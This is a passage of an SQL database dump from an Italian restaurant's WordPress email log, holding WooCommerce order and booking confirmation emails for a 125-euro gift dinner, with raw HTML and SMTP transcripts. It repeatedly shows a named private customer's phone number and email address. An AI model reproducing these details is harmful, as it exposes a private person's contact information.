padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Regala cena: Menù Creativo per 2 persone + Bevande (#regalacena-creativo-con-bevande)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\">Michela</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Gaia</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">❤️</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">125,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">125,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Metodo di pagamento:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Totale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">125,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<p style=\"margin: 0 0 16px;\"><strong>Quanti adulti?:</strong> 1</p>\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Indirizzo di fatturazione</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Gaia Marchesini									<br><a href=\"tel:3398328956\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3398328956</a>													<br>gaia.marchesini@gmail.com							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Congratulazioni per la vendita.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(21340,1052,'original_headers','Content-Type: text/html\r\nReply-to: Gaia Marchesini <gaia.marchesini@gmail.com>\r\n'),(21341,1052,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\nca, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-h=\r\neight: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4;=\r\n color: #ffffff;\'>Nuova prenotazione cliente</h1>=0A=09=09=09=09=09=09=\r\n=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=\r\n=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09=09<!-- End Header=\r\n -->=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=\r\n=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09<td align=3D\"center\" va=\r\nlign=3D\"top\">=0A=09=09=09=09=09=09=09=09=09<!-- Body -->=0A=09=09=09=09=\r\n=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"0\" cellspacing=3D\"0\" w=\r\nidth=3D\"600\" id=3D\"template_body\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=\r\n=0A=09=09=09=09=09=09=09=09=09=09=09<td valign=3D\"top\" id=3D\"body_conten=\r\nt\" style=3D\"background-color: #fdfdfd;\">=0A=09=09=09=09=09=09=09=09=09=\r\n=09=09=09<!-- Content -->=0A=09=09=09=09=09=09=09=09=09=09=09=09<table b=\r\norder=3D\"0\" cellpadding=3D\"20\" cellspacing=3D\"0\" width=3D\"100%\">=0A=09=\r\n=09=09=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=\r\n=09=09=09=09=09<td valign=3D\"top\" style=3D\"padding: 48px 48px 32px;\">=0A=\r\n=09=09=09=09=09=09=09=09=09=09=09=09=09=09=09<div id=3D\"body_content_inn=\r\ner\" style=3D\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, R=\r\noboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align=\r\n: left;\'>=0A=0A<p style=3D\"margin: 0 0 16px;\">Hai ricevuto il seguente o=\r\nrdine da Gaia Marchesini:</p>=0A=0A<h2 style=3D\'color: #557da1; display:=\r\n block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-se=\r\nrif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0=\r\n 18px; text-align: left;\'>=0A=09<a class=3D\"link\" href=3D\"https://www.ri=\r\nstorantesolymar.it/wp-admin/post.php?post=3D1051&amp;action=3Dedit\" styl=\r\ne=3D\"font-weight: normal; text-decoration: underline; color: #557da1;\">[=\r\nOrdine #1051]</a> (4 Agosto 2020)</h2>=0A=0A<div style=3D\"margin-bottom:=\r\n 40px;\">=0A=09<table class=3D\"td\" cellspacing=3D\"0\" cellpadding=3D\"6\" bo=\r\nrder=3D\"1\" style=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-=\r\nalign: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Ro=\r\nboto, Arial, sans-serif;\">=0A=09=09<thead>=0A=09=09=09<tr>=0A=09=09=09=\r\n=09<th class=3D\"td\" scope=3D\"col\" style=3D\"color: #737373; border: 1px s=\r\nolid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">=\r\nProdotto</th>=0A=09=09=09=09<th class=3D\"td\" scope=3D\"col\" style=3D\"colo=\r\nr: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding:=\r\n 12px; text-align: left;\">Quantit=C3=A0</th>=0A=09=09=09=09<th class=3D\"=\r\ntd\" scope=3D\"col\" style=3D\"color: #737373; border: 1px solid #e4e4e4; ve=\r\nrtical-align: middle; padding: 12px; text-align: left;\">Prezzo</th>=0A=\r\n=09=09=09</tr>=0A=09=09</thead>=0A=09=09<tbody>=0A=09=09=09=09<tr class=\r\n=3D\"order_item\">=0A=09=09<td class=3D\"td\" style=3D\"color: #737373; borde=\r\nr: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: m=\r\niddle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-ser=\r\nif; word-wrap: break-word;\">=0A=09=09Regala cena: Men=C3=B9 Creativo per=\r\n 2 persone + Bevande (#regalacena-creativo-con-bevande)<ul class=3D\"wc-i=\r\ntem-meta\" style=3D\"font-size: small; margin: 1em 0 0; padding: 0; list-s=\r\ntyle: none;\">=0A<li style=3D\"margin: 0.5em 0 0; padding: 0;\">=0A<strong=\r\n class=3D\"wc-item-meta-label\" style=3D\"float: left; margin-right: .25em;=\r\n clear: both;\">To:</strong> <p style=3D\"margin: 0;\">Michela</p>=0A</li>=\r\n=0A<li style=3D\"margin: 0.5em 0 0; padding: 0;\">=0A<strong class=3D\"wc-i=\r\ntem-meta-label\" style=3D\"float: left; margin-right: .25em; clear: both;\"=\r\n>From:</strong> <p style=3D\"margin: 0;\">Gaia</p>=0A</li>=0A<li style=3D\"=\r\nmargin: 0.5em 0 0; padding: 0;\">=0A<strong class=3D\"wc-item-meta-label\"=\r\n style=3D\"float: left; margin-right: .25em; clear: both;\">Message:</stro=\r\nng> <p style=3D\"margin: 0;\">=E2=9D=A4=EF=B8=8F</p>=0A</li>=0A</ul>=09=09=\r\n</td>=0A=09=09<td class=3D\"td\" style=3D\"color: #737373; border: 1px soli=\r\nd #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font=\r\n-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">=0A=09=\r\n=09=091=09=09</td>=0A=09=09<td class=3D\"td\" style=3D\"color: #737373; bor=\r\nder: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align:=\r\n middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-s=\r\nerif;\">=0A=09=09=09<span class=3D\"woocommerce-Price-amount amount\">125,0=\r\n0<span class=3D\"woocommerce-Price-currencySymbol\">=E2=82=AC</span></span=\r\n>=09=09</td>=0A=09</tr>=0A=09=0A=09=09</tbody>=0A=09=09<tfoot>=0A=09=09=\r\n=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09<th class=3D\"td\" scope=3D\"row=\r\n\" colspan=3D\"2\" style=3D\"color: #737373; border: 1px solid #e4e4e4; vert=\r\nical-align: middle; padding: 12px; text-align: left; border-top-width: 4=\r\npx;\">Subtotale:</th>=0A=09=09=09=09=09=09<td class=3D\"td\" style=3D\"color=\r\n: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 1=\r\n2px; text-align: left; border-top-width: 4px;\"><span class=3D\"woocommerc=\r\ne-Price-amount amount\">125,00<span class=3D\"woocommerce-Price-currencySy=\r\nmbol\">=E2=82=AC</span></span></td>=0A=09=09=09=09=09</tr>=0A=09=09=09=09=\r\n=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09<th class=3D\"td\" scope=3D\"row=\r\n\" colspan=3D\"2\" style=3D\"color: #737373; border: 1px solid #e4e4e4; vert=\r\nical-align: middle; padding: 12px; text-align: left;\">Metodo di pagament=\r\no:</th>=0A=09=09=09=09=09=09<td class=3D\"td\" style=3D\"color: #737373; bo=\r\nrder: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-ali=\r\ngn: left;\">PayPal</td>=0A=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=\r\n=09=09<tr>=0A=09=09=09=09=09=09<th class=3D\"td\" scope=3D\"row\" colspan=3D=\r\n\"2\" style=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-align:=\r\n middle; padding: 12px; text-align: left;\">Totale:</th>=0A=09=09=09=09=\r\n=09=09<td class=3D\"td\" style=3D\"color: #737373; border: 1px solid #e4e4e=\r\n4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\r\n=3D\"woocommerce-Price-amount amount\">125,00<span class=3D\"woocommerce-Pr=\r\nice-currencySymbol\">=E2=82=AC</span></span></td>=0A=09=09=09=09=09</tr>=\r\n=0A=09=09=09=09=09=09=09</tfoot>=0A=09</table>=0A</div>=0A=0A=0A<p style=\r\n=3D\"margin: 0 0 16px;\"><strong>Quanti adulti?:</strong> 1</p>=0A<table i=\r\nd=3D\"addresses\" cellspacing=3D\"0\" cellpadding=3D\"0\" border=3D\"0\" style=\r\n=3D\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">=\r\n=0A=09<tr>=0A=09=09<td valign=3D\"top\" width=3D\"50%\" style=3D\"text-align:=\r\n left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-ser=\r\nif; border: 0; padding: 0;\">=0A=09=09=09<h2 style=3D\'color: #557da1; dis=\r\nplay: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sa=\r\nns-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin:=\r\n 0 0 18px; text-align: left;\'>Indirizzo di fatturazione</h2>=0A=0A=09=09=\r\n=09<address class=3D\"address\" style=3D\"padding: 12px; color: #737373; bo=\r\nrder: 1px solid #e4e4e4;\">=0A=09=09=09=09Gaia Marchesini=09=09=09=09=09=\r\n=09=09=09=09<br><a href=3D\"tel:3398328956\" style=3D\"color: #557da1; font=\r\n-weight: normal; text-decoration: underline;\">3398328956</a>=09=09=09=09=\r\n=09=09=09=09=09=09=09=09=09<br>gaia.marchesini@gmail.com=09=09=09=09=09=\r\n=09=09</address>=0A=09=09</td>=0A=09=09=09</tr>=0A</table>=0A<p style=3D=\r\n\"margin: 0 0 16px;\">Congratulazioni per la vendita.</p>=0A=09=09=09=09=\r\n=09=09=09=09=09=09=09=09=09=09=09</div>=0A=09=09=09=09=09=09=09=09=09=09=\r\n=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=\r\n=09=09=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09=09=\r\n=09=09=09<!-- End Content -->=0A=09=09=09=09=09=09=09=09=09=09=09</td>=\r\n=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09</ta=\r\nble>=0A=09=09=09=09=09=09=09=09=09<!-- End Body -->=0A=09=09=09=09=09=09=\r\n=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09</table>=0A=\r\n=09=09=09=09=09</td>=0A=09=09=09=09</tr>=0A=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09<!-- Foot=\r\ner -->=0A=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"10\" cellsp=\r\nacing=3D\"0\" width=3D\"600\" id=3D\"template_footer\">=0A=09=09=09=09=09=09=\r\n=09<tr>=0A=09=09=09=09=09=09=09=09<td valign=3D\"top\" style=3D\"padding: 0=\r\n; border-radius: 6px;\">=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0\"=\r\n cellpadding=3D\"10\" cellspacing=3D\"0\" width=3D\"100%\">=0A=09=09=09=09=09=\r\n=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09<td colspan=3D\"2\"=\r\n valign=3D\"middle\" id=3D\"credit\" style=3D\'border-radius: 6px; border: 0;=\r\n color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial=\r\n, sans-serif; font-size: 12px; line-height: 150%; text-align: center; pa=\r\ndding: 24px 0;\'>=0A=09=09=09=09=09=09=09=09=09=09=09=09<p style=3D\"margi=\r\nn: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>=0A=09=09=09=09=09=09=\r\n=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=\r\n=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=09=\r\n=09=09=09=09</tr>=0A=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09<!--=\r\n End Footer -->=0A=09=09=09=09=09</td>=0A=09=09=09=09</tr>=0A=09=09=09</=\r\ntable>=0A=09=09</div>=0A=09</body>=0A</html>=0A\r\n.\r\n250 OK id=1k2wao-0008Ub-Tm\r\n'),(21342,1053,'success','1'),(21343,1053,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(21344,1053,'to_header','gaia.marchesini@gmail.com'),(21345,1053,'reply_to_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(21346,1053,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21347,1053,'original_to','gaia.marchesini@gmail.com'),(21348,1053,'original_subject','Il tuo ordine su Sol Y Mar, ristorante a Riccione è stato ricevuto!'),(21349,1053,'original_message','<!DOCTYPE html>\n<html lang=\"it-IT\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff;\'>Grazie per il tuo ordine</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Ciao Gaia,</p>\n<p style=\"margin: 0 0 16px;\">Ti informiamo che abbiamo ricevuto il tuo ordine #1051 ed è in fase di elaborazione.</p>\n\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	[Ordine #1051] (4 Agosto 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prodotto</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantità</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prezzo</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Regala cena: Menù Creativo per 2 persone + Bevande<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\">Michela</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Gaia</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">❤️</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">125,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n			<tr>\n			<td colspan=\"3\" style=\"padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n				<p style=\"margin: 0 0 16px;\">Escluso bevande</p>\n			</td>\n		</tr>\n		\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">125,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Metodo di pagamento:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Totale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">125,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<p style=\"margin: 0 0 16px;\"><strong>Quanti adulti?:</strong> 1</p>\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Indirizzo di fatturazione</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Gaia Marchesini									<br><a href=\"tel:3398328956\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3398328956</a>													<br>gaia.marchesini@gmail.com							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Grazie per aver usato www.ristorantesolymar.it.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(21350,1053,'original_headers','Content-Type: text/html\r\nReply-to: Sol Y Mar, ristorante a Riccione <notifiche@ristorantesolymar.it>\r\n'),(21351,1053,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n color: #ffffff;\'>Grazie per il tuo ordine</h1>=0A=09=09=09=09=09=09=09=\r\n=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=\r\n=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09=09<!-- End Header -->=\r\n=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=\r\n=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09<td align=3D\"center\" valig=\r\nn=3D\"top\">=0A=09=09=09=09=09=09=09=09=09<!-- Body -->=0A=09=09=09=09=09=\r\n=09=09=09=09<table border=3D\"0\" cellpadding=3D\"0\" cellspacing=3D\"0\" widt=\r\nh=3D\"600\" id=3D\"template_body\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=\r\n=09=09=09=09=09=09=09=09=09=09=09<td valign=3D\"top\" id=3D\"body_content\"=\r\n style=3D\"background-color: #fdfdfd;\">=0A=09=09=09=09=09=09=09=09=09=09=\r\n=09=09<!-- Content -->=0A=09=09=09=09=09=09=09=09=09=09=09=09<table bord=\r\ner=3D\"0\" cellpadding=3D\"20\" cellspacing=3D\"0\" width=3D\"100%\">=0A=09=09=\r\n=09=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=\r\n=09=09=09=09<td valign=3D\"top\" style=3D\"padding: 48px 48px 32px;\">=0A=09=\r\n=09=09=09=09=09=09=09=09=09=09=09=09=09=09<div id=3D\"body_content_inner\"=\r\n style=3D\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Robo=\r\nto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: l=\r\neft;\'>=0A=0A<p style=3D\"margin: 0 0 16px;\">Ciao Gaia,</p>=0A<p style=3D\"=\r\nmargin: 0 0 16px;\">Ti informiamo che abbiamo ricevuto il tuo ordine #105=\r\n1 ed =C3=A8 in fase di elaborazione.</p>=0A=0A=0A<h2 style=3D\'color: #55=\r\n7da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto,=\r\n Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130=\r\n%; margin: 0 0 18px; text-align: left;\'>=0A=09[Ordine #1051] (4 Agosto 2=\r\n020)</h2>=0A=0A<div style=3D\"margin-bottom: 40px;\">=0A=09<table class=3D=\r\n\"td\" cellspacing=3D\"0\" cellpadding=3D\"6\" border=3D\"1\" style=3D\"color: #7=\r\n37373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; f=\r\nont-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">=0A=\r\n=09=09<thead>=0A=09=09=09<tr>=0A=09=09=09=09<th class=3D\"td\" scope=3D\"co=\r\nl\" style=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-align: m=\r\niddle; padding: 12px; text-align: left;\">Prodotto</th>=0A=09=09=09=09<th=\r\n class=3D\"td\" scope=3D\"col\" style=3D\"color: #737373; border: 1px solid 